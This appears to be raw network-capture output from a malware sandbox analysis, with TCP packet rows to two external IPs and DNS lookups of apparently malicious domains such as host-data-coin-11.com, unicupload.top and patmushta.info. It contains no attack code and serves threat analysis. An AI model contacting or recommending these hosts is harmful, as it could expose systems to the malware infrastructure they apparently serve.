Jan 14, 2022 00:16:15.842966080 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.842988014 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.843008995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.843044043 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.843065977 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.843077898 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.843096018 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.843115091 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.843159914 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847008944 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847042084 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847054958 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847085953 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847101927 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847129107 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847155094 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847163916 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847182035 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847204924 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847208977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847238064 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847265005 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847268105 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847278118 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847290993 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847318888 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847343922 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847349882 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847371101 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847393036 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847398043 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847426891 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847445965 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847453117 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847457886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.847481966 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847493887 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847508907 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847560883 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847572088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.847604036 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847634077 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847664118 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847690105 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847693920 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847702980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.847716093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847742081 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847743034 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847769976 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847795010 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847799063 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847807884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.847820997 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847842932 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847848892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847877026 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847896099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.847904921 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847908020 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847933054 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847948074 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.847960949 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847986937 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.847994089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.848005056 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848012924 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848040104 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848052025 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848067045 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848086119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.848093987 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848121881 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848123074 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848146915 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848166943 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848175049 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848201990 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848221064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.848227978 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848233938 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848256111 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848265886 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848282099 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848294973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.848310947 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848329067 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848339081 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848365068 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848392010 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848397970 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848407984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.848418951 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848436117 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848444939 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848473072 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848483086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.848501921 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848510027 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848530054 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848556995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848560095 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848572969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.848613977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848618031 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848643064 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848669052 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848690987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.848696947 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.848702908 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848752022 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.848788023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.848917961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.849025965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.849136114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.849227905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.849335909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.849442959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.849543095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.849646091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.849746943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.849869013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.849960089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.850074053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.850168943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.850276947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.850373983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.850475073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.850577116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.850677013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.850775957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.850876093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.850970030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.851068974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.851166964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.851274014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.851366997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.851473093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.851567030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.851669073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.851768017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.851872921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.851964951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.852056980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.852169037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.852269888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.852369070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.852463961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.852560997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.852667093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.852762938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.852885008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.852988958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.853092909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.853198051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.853298903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.853400946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.853499889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.853599072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.853698015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.853800058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.853910923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.854001045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.854093075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.854182959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.854274035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.854365110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.854454994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.854547024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.854639053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.854732037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.855191946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.855326891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.855437040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.855545998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.855657101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.855777979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.855871916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.855966091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.856059074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.856149912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.856239080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.856336117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.856430054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.856529951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.856615067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.856709957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.856803894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.856899977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857000113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857095957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857182026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857275963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857367039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857459068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857557058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857646942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857780933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857841969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.857942104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.858032942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.858131886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.858217955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.859965086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.860091925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.860183954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.860274076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.860367060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.860451937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.860548019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.860634089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.860726118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.860853910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.860990047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.861092091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.861193895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.861298084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.861397028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.861498117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.861603975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.861660957 CET	80	49924	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.861700058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.861804962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.879009962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.879125118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.879230976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.879338980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.879441023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.879538059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.879641056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.879741907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.879842043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.879940033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.880053043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.880142927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.880237103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.880326986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.880417109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.880510092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.880604982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.880717039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.880825043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.880923033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.881025076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.881124973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.881223917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.881323099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.881423950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.881522894 CET	49902	80	192.168.2.4	185.215.113.35

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 14, 2022 00:15:08.165779114 CET	192.168.2.4	8.8.8.8	0x1e78	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:08.615135908 CET	192.168.2.4	8.8.8.8	0x7eb5	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:09.073154926 CET	192.168.2.4	8.8.8.8	0xbc1c	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:09.557881117 CET	192.168.2.4	8.8.8.8	0x8fba	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:09.726715088 CET	192.168.2.4	8.8.8.8	0xf7ef	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:10.185842037 CET	192.168.2.4	8.8.8.8	0xdd6e	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:11.804354906 CET	192.168.2.4	8.8.8.8	0x4665	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:12.231695890 CET	192.168.2.4	8.8.8.8	0x96b7	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:12.427944899 CET	192.168.2.4	8.8.8.8	0x550f	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:14.237322092 CET	192.168.2.4	8.8.8.8	0xcfa	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:14.409171104 CET	192.168.2.4	8.8.8.8	0xa3f6	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:14.572695971 CET	192.168.2.4	8.8.8.8	0x786b	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:15.171166897 CET	192.168.2.4	8.8.8.8	0xe925	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:15.352641106 CET	192.168.2.4	8.8.8.8	0x9efb	Standard query (0)	privacy-tools-for-you-780.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:17.959861994 CET	192.168.2.4	8.8.8.8	0x644f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:18.142793894 CET	192.168.2.4	8.8.8.8	0x60c7	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:18.631000996 CET	192.168.2.4	8.8.8.8	0x9905	Standard query (0)	unicupload.top	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:18.719808102 CET	192.168.2.4	8.8.8.8	0x4acb	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:19.382601023 CET	192.168.2.4	8.8.8.8	0xa2b4	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:19.582433939 CET	192.168.2.4	8.8.8.8	0x1c8c	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:20.064352989 CET	192.168.2.4	8.8.8.8	0xc340	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:20.237083912 CET	192.168.2.4	8.8.8.8	0x2005	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:22.403347015 CET	192.168.2.4	8.8.8.8	0x5113	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:22.567151070 CET	192.168.2.4	8.8.8.8	0x9be3	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:22.737056971 CET	192.168.2.4	8.8.8.8	0xdd94	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:22.901120901 CET	192.168.2.4	8.8.8.8	0x4237	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:24.925096989 CET	192.168.2.4	8.8.8.8	0xac12	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:25.083369970 CET	192.168.2.4	8.8.8.8	0x65db	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:25.277966976 CET	192.168.2.4	8.8.8.8	0xd16a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:25.443576097 CET	192.168.2.4	8.8.8.8	0x2be3	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:27.139034986 CET	192.168.2.4	8.8.8.8	0xe05	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:27.313374996 CET	192.168.2.4	8.8.8.8	0xc920	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:27.475970984 CET	192.168.2.4	8.8.8.8	0x45d7	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:39.929191113 CET	192.168.2.4	8.8.8.8	0xd04f	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:42.591212988 CET	192.168.2.4	8.8.8.8	0x6af	Standard query (0)	patmushta.info	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:48.683623075 CET	192.168.2.4	8.8.8.8	0x9e4b	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:48.853013992 CET	192.168.2.4	8.8.8.8	0x56ab	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:49.095482111 CET	192.168.2.4	8.8.8.8	0x22c2	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:49.260747910 CET	192.168.2.4	8.8.8.8	0xafe7	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:49.424179077 CET	192.168.2.4	8.8.8.8	0xda2a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:49.588679075 CET	192.168.2.4	8.8.8.8	0x9b8	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:49.767848015 CET	192.168.2.4	8.8.8.8	0xe42d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.060847998 CET	192.168.2.4	8.8.8.8	0x1ab9	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.231005907 CET	192.168.2.4	8.8.8.8	0xbd50	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.394597054 CET	192.168.2.4	8.8.8.8	0x96b5	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.560926914 CET	192.168.2.4	8.8.8.8	0xdc5d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.750709057 CET	192.168.2.4	8.8.8.8	0x9e07	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:50.917156935 CET	192.168.2.4	8.8.8.8	0xee49	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:51.125756979 CET	192.168.2.4	8.8.8.8	0x2dda	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 14, 2022 00:15:55.295429945 CET	192.168.2.4	8.8.8.8	0x10d7	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
